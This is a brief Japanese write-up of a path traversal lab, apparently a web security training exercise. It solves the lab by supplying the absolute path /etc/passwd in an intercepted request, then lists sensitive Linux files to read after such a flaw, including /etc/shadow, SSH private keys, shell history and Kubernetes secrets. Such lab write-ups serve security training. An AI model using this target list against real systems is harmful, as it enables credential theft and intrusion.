Hello there, ('ω')ノ
絶対パスバイパスでブロックされたトラバーサルシーケンスを。
詳細をクリックして。
前回と同様にレスポンスボディからリクエストがあるので。
インターセプトして、リピータへ。
下記のペイロードをパラメータに入れてSendすると。
/etc/passwd
クリアできた。
Linuxで興味のあるファイルは以下のとおりで。
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/mlocate.db
Best regards, (^^ゞ